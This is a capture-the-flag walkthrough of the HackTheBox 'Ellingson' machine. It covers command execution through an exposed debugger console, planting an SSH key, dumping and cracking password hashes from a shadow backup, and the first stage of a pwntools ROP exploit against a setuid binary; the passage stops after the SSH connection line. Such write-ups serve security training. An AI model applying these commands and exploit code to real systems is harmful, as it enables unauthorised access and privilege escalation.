ELLINGSON (HACKTHEBOX)

root@kali:~/Downloads# nmap -A 10.10.10.139
Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-20 13:51 GMT
Nmap scan report for 10.10.10.139
Host is up (0.25s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 49:e8:f1:2a:80:62:de:7e:02:40:a1:f4:30:d2:88:a6 (RSA)
| 256 c8:02:cf:a0:f2:d8:5d:4f:7d:c7:66:0b:4d:5d:0b:df (ECDSA)
|_ 256 a5:a9:95:f5:4a:f4:ae:f8:b6:37:92:b8:9a:2a:b4:66 (ED25519)
80/tcp open http nginx 1.14.0 (Ubuntu)
|_http-server-header: nginx/1.14.0 (Ubuntu)
| http-title: Ellingson Mineral Corp
|_Requested resource was http://10.10.10.139/index
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 – 4.11 (92%), Linux 3.18 (92%), Linux 3.2 – 4.9 (92%), Crestron XPanel control system (90%), Linux 3.16 (89%), ASUS RT-N56U WAP (Linux 3.4) (87%), Linux 3.1 (87%), Linux 3.2 (87%), HP P2000 G3 NAS device (87%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (87%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 257.22 ms 10.10.14.1
2 257.29 ms 10.10.10.139

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 36.34 seconds

Only two services are exposed (SSH on 22, nginx on 80), so the web application is the starting point. In the browser:

http://10.10.10.139/index

http://10.10.10.139/articles/4

Open this article. A terminal icon on the right-hand side of the page opens an interactive Python console (note the `>>>` prompt below; `os` is already in scope, so shell commands can be run through os.popen). A debugger console like this, reachable without any authentication, is the initial foothold. In the console:

>>>

[console ready]
>>> print (os.popen('whoami').read())
hal

>>> print (os.popen('pwd').read())
/home/hal/.ssh

>>> print (os.popen('ls -la /home').read())
total 24
drwxr-xr-x 6 root root 4096 Mar 9 2019 .
drwxr-xr-x 23 root root 4096 Mar 9 2019 ..
drwxrwx— 3 duke duke 4096 Mar 10 2019 duke
drwxrwx— 6 hal hal 4096 Oct 20 15:11 hal
drwxrwx— 6 margo margo 4096 Oct 20 07:34 margo
drwxrwx— 4 theplague theplague 4096 May 7 13:13 theplague

>>> print (os.popen('ls -la /home/hal').read())
total 1764
drwxrwx— 6 hal hal 4096 Oct 20 15:11 .
drwxr-xr-x 6 root root 4096 Mar 9 2019 ..
-rw——- 1 hal hal 27 Oct 20 12:42 .bash_history
-rw-r–r– 1 hal hal 220 Mar 9 2019 .bash_logout
-rw-r–r– 1 hal hal 3771 Mar 9 2019 .bashrc
drwx—— 2 hal hal 4096 Mar 10 2019 .cache
-rwxrw-r– 1 hal hal 1884 Oct 20 12:23 exp.py
drwx—— 3 hal hal 4096 Mar 10 2019 .gnupg
-rw——- 1 hal hal 32 Oct 20 12:51 .lesshst
drwxrwxr-x 3 hal hal 4096 Oct 20 14:11 .local
-rw-rw-r– 1 hal hal 31736 Oct 20 15:11 lse.sh
-rw-rw-r– 1 hal hal 1703336 Oct 20 12:53 passwds_grepped
-rw-r–r– 1 hal hal 807 Mar 9 2019 .profile
-rw-rw-r– 1 hal hal 220 Oct 20 12:33 README
drwx—— 2 hal hal 4096 Oct 20 15:35 .ssh
-rw——- 1 hal hal 15779 Oct 20 15:11 .viminfo

>>> print (os.popen('echo "ssh-rsa <public key from your id_rsa.pub> root@kali" > /home/hal/.ssh/authorized_keys').read())

(The key material is omitted above.) Note that `>` replaces whatever authorized_keys hal already had; `>>` appends and is the less destructive choice on a shared or real target. Either way, remove the key again when you are done.

Now, from the attacking machine, log in with the matching private key (ellingson.htb is assumed to resolve to 10.10.10.139, e.g. via /etc/hosts):

root@kali:~/Downloads# ssh -i ./id_rsa hal@ellingson.htb
Welcome to Ubuntu 18.04.1 LTS (GNU/Linux 4.15.0-46-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

System information as of Sun Oct 20 16:15:49 UTC 2019

System load: 0.0 Processes: 124
Usage of /: 23.7% of 19.56GB Users logged in: 2
Memory usage: 32% IP address for ens33: 10.10.10.139
Swap usage: 0%

=> There is 1 zombie process.

* Canonical Livepatch is available for installation.
– Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch

163 packages can be updated.
80 updates are security updates.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

Last login: Sun Oct 20 15:06:21 2019 from 10.10.14.27
hal@ellingson:~$

hal@ellingson:~$ ls -la
total 1764
drwxrwx— 6 hal hal 4096 Oct 20 15:11 .
drwxr-xr-x 6 root root 4096 Mar 9 2019 ..
-rw——- 1 hal hal 27 Oct 20 12:42 .bash_history
-rw-r–r– 1 hal hal 220 Mar 9 2019 .bash_logout
-rw-r–r– 1 hal hal 3771 Mar 9 2019 .bashrc
drwx—— 2 hal hal 4096 Mar 10 2019 .cache
-rwxrw-r– 1 hal hal 1884 Oct 20 12:23 exp.py
drwx—— 3 hal hal 4096 Mar 10 2019 .gnupg
-rw——- 1 hal hal 32 Oct 20 12:51 .lesshst
drwxrwxr-x 3 hal hal 4096 Oct 20 14:11 .local
-rw-rw-r– 1 hal hal 31736 Oct 20 15:11 lse.sh
-rw-rw-r– 1 hal hal 1703336 Oct 20 12:53 passwds_grepped
-rw-r–r– 1 hal hal 807 Mar 9 2019 .profile
-rw-rw-r– 1 hal hal 220 Oct 20 12:33 README
drwx—— 2 hal hal 4096 Oct 20 15:35 .ssh
-rw——- 1 hal hal 15779 Oct 20 15:11 .viminfo

exp.py, lse.sh and passwds_grepped in hal's home look like leftovers from other players on the shared box rather than part of the intended path. /var/backups, on the other hand, is worth a look:

hal@ellingson:~$ cd /var/backups
hal@ellingson:/var/backups$ ls -la
total 888
drwxr-xr-x 2 root root 4096 Oct 20 06:25 .
drwxr-xr-x 14 root root 4096 Mar 9 2019 ..
-rw-r–r– 1 root root 61440 Mar 10 2019 alternatives.tar.0
-rw-r–r– 1 root root 8255 Mar 9 2019 apt.extended_states.0
-rw-r–r– 1 root root 437 Jul 25 2018 dpkg.diversions.0
-rw-r–r– 1 root root 202 Jul 25 2018 dpkg.diversions.1.gz
-rw-r–r– 1 root root 295 Mar 9 2019 dpkg.statoverride.0
-rw-r–r– 1 root root 196 Mar 9 2019 dpkg.statoverride.1.gz
-rw-r–r– 1 root root 616296 May 7 11:23 dpkg.status.0
-rw-r–r– 1 root root 175878 Mar 9 2019 dpkg.status.1.gz
-rw——- 1 root root 825 May 7 11:22 group.bak
-rw——- 1 root shadow 689 May 7 11:22 gshadow.bak
-rw——- 1 root root 1757 Mar 9 2019 passwd.bak
-rw——- 1 root shadow 1330 Mar 9 2019 shadow.bak

shadow.bak is a copy of /etc/shadow owned by root:shadow. The permission column is garbled in this transcript, but hal can read it (presumably through a group membership; `id` would confirm which one), which hands over every user's password hash:

hal@ellingson:/var/backups$ cat shadow.bak
root:*:17737:0:99999:7:::
daemon:*:17737:0:99999:7:::
bin:*:17737:0:99999:7:::
sys:*:17737:0:99999:7:::
sync:*:17737:0:99999:7:::
games:*:17737:0:99999:7:::
man:*:17737:0:99999:7:::
lp:*:17737:0:99999:7:::
mail:*:17737:0:99999:7:::
news:*:17737:0:99999:7:::
uucp:*:17737:0:99999:7:::
proxy:*:17737:0:99999:7:::
www-data:*:17737:0:99999:7:::
backup:*:17737:0:99999:7:::
list:*:17737:0:99999:7:::
irc:*:17737:0:99999:7:::
gnats:*:17737:0:99999:7:::
nobody:*:17737:0:99999:7:::
systemd-network:*:17737:0:99999:7:::
systemd-resolve:*:17737:0:99999:7:::
syslog:*:17737:0:99999:7:::
messagebus:*:17737:0:99999:7:::
_apt:*:17737:0:99999:7:::
lxd:*:17737:0:99999:7:::
uuidd:*:17737:0:99999:7:::
dnsmasq:*:17737:0:99999:7:::
landscape:*:17737:0:99999:7:::
pollinate:*:17737:0:99999:7:::
sshd:*:17737:0:99999:7:::
theplague:$6$.5ef7Dajxto8Lz3u$Si5BDZZ81UxRCWEJbbQH9mBCdnuptj/aG6mqeu9UfeeSY7Ot9gp2wbQLTAJaahnlTrxN613L6Vner4tO1W.ot/:17964:0:99999:7:::
hal:$6$UYTy.cHj$qGyl.fQ1PlXPllI4rbx6KM.lW6b3CJ.k32JxviVqCC2AJPpmybhsA8zPRf0/i92BTpOKtrWcqsFAcdSxEkee30:17964:0:99999:7:::
margo:$6$Lv8rcvK8$la/ms1mYal7QDxbXUYiD7LAADl.yE4H7mUGF6eTlYaZ2DVPi9z1bDIzqGZFwWrPkRrB9G/kbd72poeAnyJL4c1:17964:0:99999:7:::
duke:$6$bFjry0BT$OtPFpMfL/KuUZOafZalqHINNX/acVeIDiXXCPo9dPi1YHOp9AAAAnFTfEh.2AheGIvXMGMnEFl5DlTAbIzwYc/:17964:0:99999:7:::

On the attacking machine, crack margo's hash offline:

root@kali:~/Downloads# echo 'margo:$6$Lv8rcvK8$la/ms1mYal7QDxbXUYiD7LAADl.yE4H7mUGF6eTlYaZ2DVPi9z1bDIzqGZFwWrPkRrB9G/kbd72poeAnyJL4c1:17964:0:99999:7:::' > margo.hash

sha512crypt at 5000 rounds is slow, so narrow rockyou.txt to candidates containing "god" (a filter presumably prompted by the password hint in the site's articles) instead of running the whole wordlist:

root@kali:~/Downloads# grep -i god /usr/share/wordlists/rockyou.txt > list.txt

root@kali:~/Downloads# john --wordlist=./list.txt margo.hash
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 128/128 AVX 2x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 4 OpenMP threads
Press ‘q’ or Ctrl-C to abort, almost any other key for status
iamgod$08 (margo)
1g 0:00:00:01 DONE (2019-10-20 16:18) 0.5464g/s 3777p/s 3777c/s 3777C/s iamgod22..gupgod
Use the "--show" option to display all of the cracked passwords reliably
Session completed

root@kali:~/Downloads# ssh margo@ellingson.htb
margo@ellingson.htb’s password: iamgod$08
Welcome to Ubuntu 18.04.1 LTS (GNU/Linux 4.15.0-46-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

System information as of Sun Oct 20 16:21:21 UTC 2019

System load: 0.0 Processes: 127
Usage of /: 23.7% of 19.56GB Users logged in: 2
Memory usage: 32% IP address for ens33: 10.10.10.139
Swap usage: 0%

=> There is 1 zombie process.

* Canonical Livepatch is available for installation.
– Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch

163 packages can be updated.
80 updates are security updates.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

Last login: Sun Oct 20 13:39:26 2019 from 10.10.15.60
margo@ellingson:~$

margo@ellingson:~$ cat user.txt
d0ff9e3f9da8bXXXXXXXXXXXXXXXXXXXXXXXX

margo@ellingson:~$ find / -perm -4000 2>/dev/null
/usr/bin/at
/usr/bin/newgrp
/usr/bin/pkexec
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/garbage
/usr/bin/newuidmap
/usr/bin/sudo
/usr/bin/traceroute6.iputils
/usr/bin/chfn
/usr/bin/newgidmap
/usr/bin/chsh
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/snapd/snap-confine
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/bin/su
/bin/umount
/bin/ntfs-3g
/bin/ping
/bin/mount
/bin/fusermount
/snap/core/6405/bin/mount
/snap/core/6405/bin/ping
/snap/core/6405/bin/ping6
/snap/core/6405/bin/su
/snap/core/6405/bin/umount
/snap/core/6405/usr/bin/chfn
/snap/core/6405/usr/bin/chsh
/snap/core/6405/usr/bin/gpasswd
/snap/core/6405/usr/bin/newgrp
/snap/core/6405/usr/bin/passwd
/snap/core/6405/usr/bin/sudo
/snap/core/6405/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core/6405/usr/lib/openssh/ssh-keysign
/snap/core/6405/usr/lib/snapd/snap-confine
/snap/core/6405/usr/sbin/pppd
/snap/core/4917/bin/mount
/snap/core/4917/bin/ping
/snap/core/4917/bin/ping6
/snap/core/4917/bin/su
/snap/core/4917/bin/umount
/snap/core/4917/usr/bin/chfn
/snap/core/4917/usr/bin/chsh
/snap/core/4917/usr/bin/gpasswd
/snap/core/4917/usr/bin/newgrp
/snap/core/4917/usr/bin/passwd
/snap/core/4917/usr/bin/sudo
/snap/core/4917/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core/4917/usr/lib/openssh/ssh-keysign
/snap/core/4917/usr/lib/snapd/snap-confine
/snap/core/4917/usr/sbin/pppd
/snap/core/6818/bin/mount
/snap/core/6818/bin/ping
/snap/core/6818/bin/ping6
/snap/core/6818/bin/su
/snap/core/6818/bin/umount
/snap/core/6818/usr/bin/chfn
/snap/core/6818/usr/bin/chsh
/snap/core/6818/usr/bin/gpasswd
/snap/core/6818/usr/bin/newgrp
/snap/core/6818/usr/bin/passwd
/snap/core/6818/usr/bin/sudo
/snap/core/6818/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core/6818/usr/lib/openssh/ssh-keysign
/snap/core/6818/usr/lib/snapd/snap-confine
/snap/core/6818/usr/sbin/pppd

Every entry in that list is a stock Ubuntu or snap binary except /usr/bin/garbage, so that is the privilege-escalation target. Poke at it:

margo@ellingson:~$ /usr/bin/garbage
Enter access password: test

access denied.

margo@ellingson:~$ /usr/bin/garbage
Enter access password: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

access denied.
Segmentation fault (core dumped)

The crash only after "access denied." is printed indicates that the long password overruns a stack buffer and corrupts the saved return address (confirmed in gdb below, where the fault is at the `ret` of auth()). Copy the binary off the box to analyse it locally:

root@kali:~/Downloads# scp margo@ellingson.htb:/usr/bin/garbage ./
margo@ellingson.htb’s password: iamgod$08
garbage 100% 18KB 34.2KB/s 00:00

root@kali:~/Downloads# file garbage
garbage: setuid ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=de1fde9d14eea8a6dfd050fffe52bba92a339959, not stripped

root@kali:~/Desktop/HTB/boxes/ellingson# checksec ./garbage
[*] ‘/root/Desktop/HTB/boxes/ellingson/garbage’
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE

What checksec tells us: no stack canary, so the overflow reaches the return address unhindered; NX is on, so no shellcode on the stack; no PIE, so the binary's own gadgets, PLT and GOT sit at fixed addresses. Back on the target, check whether ASLR is enabled for the libraries:

margo@ellingson:~$ cat /proc/sys/kernel/randomize_va_space
2

randomize_va_space = 2 is full ASLR: libc is mapped at a different base on every run, so its address has to be leaked at runtime before system() can be called — hence the two-stage exploit below. Identify the libc the binary loads:

margo@ellingson:~$ ldd /usr/bin/garbage
linux-vdso.so.1 (0x00007ffe349e2000)
libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f478a843000)
/lib64/ld-linux-x86-64.so.2 (0x00007f478ac34000)

On the attacking machine, copy the target's own libc. The offsets of system, "/bin/sh" and __libc_start_main used by the exploit are read from this file, so a different libc build would yield wrong addresses and a crash:

root@kali:~/Downloads# scp margo@ellingson.htb:/lib/x86_64-linux-gnu/libc.so.6 ./
margo@ellingson.htb’s password:iamgod$08
libc.so.6

100% 1983KB 951.6KB/s 00:02
root@kali:~/Downloads# wget -O ~/.gdbinit-gef.py -q https://github.com/hugsy/gef/raw/master/gef.py
root@kali:~/Downloads# echo source ~/.gdbinit-gef.py >> ~/.gdbinit

Supply-chain caveat: this fetches an unpinned script straight from a GitHub master branch and sources it into gdb on every start. For anything beyond a throwaway lab VM, pin a release tag and verify the checksum (or install gef from a package) before sourcing it.

root@kali:~/Downloads# gdb -q garbage
GEF for linux ready, type `gef’ to start, `gef config’ to configure
77 commands loaded for GDB 8.3 using Python engine 3.7
[*] 3 commands could not be loaded, run `gef missing` to know why.
GEF for linux ready, type `gef’ to start, `gef config’ to configure
77 commands loaded for GDB 8.3 using Python engine 3.7
[*] 3 commands could not be loaded, run `gef missing` to know why.
Reading symbols from garbage…
(No debugging symbols found in garbage)
gef➤ pattern create
[+] Generating a pattern of 1024 bytes
aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaagaaaaaaahaaaaaaaiaaaaaaajaaaaaaakaaaaaaalaaaaaaamaaaaaaanaaaaaaaoaaaaaaapaaaaaaaqaaaaaaaraaaaaaasaaaaaaataaaaaaauaaaaaaavaaaaaaawaaaaaaaxaaaaaaayaaaaaaazaaaaaabbaaaaaabcaaaaaabdaaaaaabeaaaaaabfaaaaaabgaaaaaabhaaaaaabiaaaaaabjaaaaaabkaaaaaablaaaaaabmaaaaaabnaaaaaaboaaaaaabpaaaaaabqaaaaaabraaaaaabsaaaaaabtaaaaaabuaaaaaabvaaaaaabwaaaaaabxaaaaaabyaaaaaabzaaaaaacbaaaaaaccaaaaaacdaaaaaaceaaaaaacfaaaaaacgaaaaaachaaaaaaciaaaaaacjaaaaaackaaaaaaclaaaaaacmaaaaaacnaaaaaacoaaaaaacpaaaaaacqaaaaaacraaaaaacsaaaaaactaaaaaacuaaaaaacvaaaaaacwaaaaaacxaaaaaacyaaaaaaczaaaaaadbaaaaaadcaaaaaaddaaaaaadeaaaaaadfaaaaaadgaaaaaadhaaaaaadiaaaaaadjaaaaaadkaaaaaadlaaaaaadmaaaaaadnaaaaaadoaaaaaadpaaaaaadqaaaaaadraaaaaadsaaaaaadtaaaaaaduaaaaaadvaaaaaadwaaaaaadxaaaaaadyaaaaaadzaaaaaaebaaaaaaecaaaaaaedaaaaaaeeaaaaaaefaaaaaaegaaaaaaehaaaaaaeiaaaaaaejaaaaaaekaaaaaaelaaaaaaemaaaaaaenaaaaaaeoaaaaaaepaaaaaaeqaaaaaaeraaaaaaesaaaaaaetaaaaaaeuaaaaaaevaaaaaaewaaaaaaexaaaaaaeyaaaaaaezaaaaaafbaaaaaafcaaaaaaf
[+] Saved as ‘$_gef0’

gef➤ r
Starting program: /root/Downloads/garbage
Enter access password: aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaagaaaaaaahaaaaaaaiaaaaaaajaaaaaaakaaaaaaalaaaaaaamaaaaaaanaaaaaaaoaaaaaaapaaaaaaaqaaaaaaaraaaaaaasaaaaaaataaaaaaauaaaaaaavaaaaaaawaaaaaaaxaaaaaaayaaaaaaazaaaaaabbaaaaaabcaaaaaabdaaaaaabeaaaaaabfaaaaaabgaaaaaabhaaaaaabiaaaaaabjaaaaaabkaaaaaablaaaaaabmaaaaaabnaaaaaaboaaaaaabpaaaaaabqaaaaaabraaaaaabsaaaaaabtaaaaaabuaaaaaabvaaaaaabwaaaaaabxaaaaaabyaaaaaabzaaaaaacbaaaaaaccaaaaaacdaaaaaaceaaaaaacfaaaaaacgaaaaaachaaaaaaciaaaaaacjaaaaaackaaaaaaclaaaaaacmaaaaaacnaaaaaacoaaaaaacpaaaaaacqaaaaaacraaaaaacsaaaaaactaaaaaacuaaaaaacvaaaaaacwaaaaaacxaaaaaacyaaaaaaczaaaaaadbaaaaaadcaaaaaaddaaaaaadeaaaaaadfaaaaaadgaaaaaadhaaaaaadiaaaaaadjaaaaaadkaaaaaadlaaaaaadmaaaaaadnaaaaaadoaaaaaadpaaaaaadqaaaaaadraaaaaadsaaaaaadtaaaaaaduaaaaaadvaaaaaadwaaaaaadxaaaaaadyaaaaaadzaaaaaaebaaaaaaecaaaaaaedaaaaaaeeaaaaaaefaaaaaaegaaaaaaehaaaaaaeiaaaaaaejaaaaaaekaaaaaaelaaaaaaemaaaaaaenaaaaaaeoaaaaaaepaaaaaaeqaaaaaaeraaaaaaesaaaaaaetaaaaaaeuaaaaaaevaaaaaaewaaaaaaexaaaaaaeyaaaaaaezaaaaaafbaaaaaafcaaaaaaf

access denied.

Program received signal SIGSEGV, Segmentation fault.
0x0000000000401618 in auth ()
[ Legend: Modified register | Code | Heap | Stack | String ]
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── registers ────
$rax : 0x0
$rbx : 0x0
$rcx : 0x00007fb5f32ad504 → 0x5477fffff0003d48 (“H=”?)
$rdx : 0x00007fb5f33808c0 → 0x0000000000000000
$rsp : 0x00007ffec6b15558 → “raaaaaaasaaaaaaataaaaaaauaaaaaaavaaaaaaawaaaaaaaxa[…]”
$rbp : 0x6161616161616171 (“qaaaaaaa”?)
$rsi : 0x00000000007c4640 → “access denied.\nssword:”
$rdi : 0x0
$rip : 0x0000000000401618 → <auth+261> ret
$r8 : 0x00007fb5f3385500 → 0x00007fb5f3385500 → [loop detected]
$r9 : 0x00007fb5f337f848 → 0x00007fb5f337f760 → 0x00000000fbad2a84
$r10 : 0xfffffffffffff638
$r11 : 0x246
$r12 : 0x0000000000401170 → <_start+0> xor ebp, ebp
$r13 : 0x00007ffec6b15650 → “xaaaaaabyaaaaaabzaaaaaacbaaaaaaccaaaaaacdaaaaaacea[…]”
$r14 : 0x0
$r15 : 0x0
$eflags: [ZERO carry PARITY adjust sign trap INTERRUPT direction overflow RESUME virtualx86 identification]
$cs: 0x0033 $ss: 0x002b $ds: 0x0000 $es: 0x0000 $fs: 0x0000 $gs: 0x0000
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── stack ────
0x00007ffec6b15558│+0x0000: “raaaaaaasaaaaaaataaaaaaauaaaaaaavaaaaaaawaaaaaaaxa[…]” ← $rsp
0x00007ffec6b15560│+0x0008: “saaaaaaataaaaaaauaaaaaaavaaaaaaawaaaaaaaxaaaaaaaya[…]”
0x00007ffec6b15568│+0x0010: “taaaaaaauaaaaaaavaaaaaaawaaaaaaaxaaaaaaayaaaaaaaza[…]”
0x00007ffec6b15570│+0x0018: “uaaaaaaavaaaaaaawaaaaaaaxaaaaaaayaaaaaaazaaaaaabba[…]”
0x00007ffec6b15578│+0x0020: “vaaaaaaawaaaaaaaxaaaaaaayaaaaaaazaaaaaabbaaaaaabca[…]”
0x00007ffec6b15580│+0x0028: “waaaaaaaxaaaaaaayaaaaaaazaaaaaabbaaaaaabcaaaaaabda[…]”
0x00007ffec6b15588│+0x0030: “xaaaaaaayaaaaaaazaaaaaabbaaaaaabcaaaaaabdaaaaaabea[…]”
0x00007ffec6b15590│+0x0038: “yaaaaaaazaaaaaabbaaaaaabcaaaaaabdaaaaaabeaaaaaabfa[…]”
─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── code:x86:64 ────
0x40160d <auth+250> call 0x401050 <puts@plt> 0x401612 <auth+255> mov eax, 0x0
0x401617 <auth+260> leave
→ 0x401618 <auth+261> ret
[!] Cannot disassemble from $PC
─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── threads ────
[#0] Id 1, Name: “garbage”, stopped, reason: SIGSEGV
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── trace ────
[#0] 0x401618 → auth()
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
[ Legend: Modified register | Code | Heap | Stack | String ]
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── registers ────
$rax : 0x0
$rbx : 0x0
$rcx : 0x00007fb5f32ad504 → 0x5477fffff0003d48 (“H=”?)
$rdx : 0x00007fb5f33808c0 → 0x0000000000000000
$rsp : 0x00007ffec6b15558 → “raaaaaaasaaaaaaataaaaaaauaaaaaaavaaaaaaawaaaaaaaxa[…]”
$rbp : 0x6161616161616171 (“qaaaaaaa”?)
$rsi : 0x00000000007c4640 → “access denied.\nssword:”
$rdi : 0x0
$rip : 0x0000000000401618 → <auth+261> ret
$r8 : 0x00007fb5f3385500 → 0x00007fb5f3385500 → [loop detected]
$r9 : 0x00007fb5f337f848 → 0x00007fb5f337f760 → 0x00000000fbad2a84
$r10 : 0xfffffffffffff638
$r11 : 0x246
$r12 : 0x0000000000401170 → <_start+0> xor ebp, ebp
$r13 : 0x00007ffec6b15650 → “xaaaaaabyaaaaaabzaaaaaacbaaaaaaccaaaaaacdaaaaaacea[…]”
$r14 : 0x0
$r15 : 0x0
$eflags: [ZERO carry PARITY adjust sign trap INTERRUPT direction overflow RESUME virtualx86 identification]
$cs: 0x0033 $ss: 0x002b $ds: 0x0000 $es: 0x0000 $fs: 0x0000 $gs: 0x0000
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── stack ────
0x00007ffec6b15558│+0x0000: “raaaaaaasaaaaaaataaaaaaauaaaaaaavaaaaaaawaaaaaaaxa[…]” ← $rsp
0x00007ffec6b15560│+0x0008: “saaaaaaataaaaaaauaaaaaaavaaaaaaawaaaaaaaxaaaaaaaya[…]”
0x00007ffec6b15568│+0x0010: “taaaaaaauaaaaaaavaaaaaaawaaaaaaaxaaaaaaayaaaaaaaza[…]”
0x00007ffec6b15570│+0x0018: “uaaaaaaavaaaaaaawaaaaaaaxaaaaaaayaaaaaaazaaaaaabba[…]”
0x00007ffec6b15578│+0x0020: “vaaaaaaawaaaaaaaxaaaaaaayaaaaaaazaaaaaabbaaaaaabca[…]”
0x00007ffec6b15580│+0x0028: “waaaaaaaxaaaaaaayaaaaaaazaaaaaabbaaaaaabcaaaaaabda[…]”
0x00007ffec6b15588│+0x0030: “xaaaaaaayaaaaaaazaaaaaabbaaaaaabcaaaaaabdaaaaaabea[…]”
0x00007ffec6b15590│+0x0038: “yaaaaaaazaaaaaabbaaaaaabcaaaaaabdaaaaaabeaaaaaabfa[…]”
─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── code:x86:64 ────
0x40160d <auth+250> call 0x401050 <puts@plt> 0x401612 <auth+255> mov eax, 0x0
0x401617 <auth+260> leave
→ 0x401618 <auth+261> ret
[!] Cannot disassemble from $PC
─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── threads ────
[#0] Id 1, Name: “garbage”, stopped, reason: SIGSEGV
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── trace ────
[#0] 0x401618 → auth()
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
gef➤

gef➤ pattern offset raaaaaaasaaaaaaataaaaaaauaaaaaaavaaaaaaawaaaaaaaxa
[+] Searching ‘raaaaaaasaaaaaaataaaaaaauaaaaaaavaaaaaaawaaaaaaaxa’
[+] Found at offset 136 (big-endian search)

136 bytes of input reach the saved return address of auth(); that is the `"A" * 136` padding used by every stage of the exploit below.

On the attacking machine, write the first stage of the exploit. It leaks a libc address by calling puts() on the GOT entry of __libc_start_main and then returning into main(), so the same process can be fed a second payload:

root@kali:~# gedit exploit.py

#!/usr/bin/python
from pwn import *

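def leak(p, elf, libc, rop):
    """Stage 1: leak the runtime address of __libc_start_main via the GOT.

    auth() reads the password into a stack buffer it can overrun; 136 bytes
    of padding (found with gef ``pattern offset``) reach the saved return
    address.  The binary is not PIE, so PLT/GOT and gadget addresses are
    fixed and the chain is simply:

        pop rdi; ret -> &GOT[__libc_start_main] -> puts@plt -> main

    puts() prints the resolved libc pointer, then main() re-runs and prompts
    again, so the same process can take the next payload.

    Args:
        p:    pwntools tube attached to /usr/bin/garbage.
        elf:  ELF('./garbage').
        libc: unused here; kept so every stage shares one signature.
        rop:  ROP(elf), used to locate the gadget.

    Returns:
        int: leaked address of __libc_start_main in the target's libc.
    """
    POP_RDI = rop.find_gadget(['pop rdi', 'ret'])[0]
    # Ask for the GOT slot explicitly: elf.got is the stable API for it
    # (older pwntools also happened to expose it through elf.symbols).
    LIBC_START_MAIN = elf.got['__libc_start_main']
    PUTS = elf.plt['puts']
    MAIN = elf.symbols['main']

    log.info("puts@plt: " + hex(PUTS))
    log.info("__libc_start_main: " + hex(LIBC_START_MAIN))
    log.info("pop rdi gadget: " + hex(POP_RDI))

    payload = b"A" * 136
    payload += p64(POP_RDI)
    payload += p64(LIBC_START_MAIN)
    payload += p64(PUTS)
    payload += p64(MAIN)

    p.recvuntil(b'password:')
    p.sendline(payload)
    p.recvline()  # empty line printed before the verdict
    p.recvline()  # "access denied."

    # The pointer has 6 significant bytes (0x00007fXX_XXXXXXXX).  Read a
    # fixed count rather than recvline(): if any of those bytes is 0x0a,
    # recvline() stops early and the value comes back truncated (the first
    # run of this script printed 0xb0 for exactly that reason).
    raw = p.recvn(6)
    p.recvline()  # newline appended by puts()
    leaked = u64(raw.ljust(8, b"\x00"))

    # Sanity check: on this target libc lives at 0x7f.... .  Anything else
    # means the output was not a clean pointer (e.g. a NUL byte made puts()
    # stop early); abort instead of returning into garbage later.
    if leaked >> 40 != 0x7f:
        log.error("Bad leak %#x - rerun the exploit" % leaked)

    log.success("Leaked __libc_start_main: " + hex(leaked))
    return leaked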

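# Stage 0: a process on the target, over SSH as margo (password recovered
# from /var/backups/shadow.bak with john).  Hard-coding credentials is
# acceptable for a lab write-up only; outside a CTF read them from the
# environment or a secrets store.
r = ssh(host='ellingson.htb', user='margo', password='iamgod$08')
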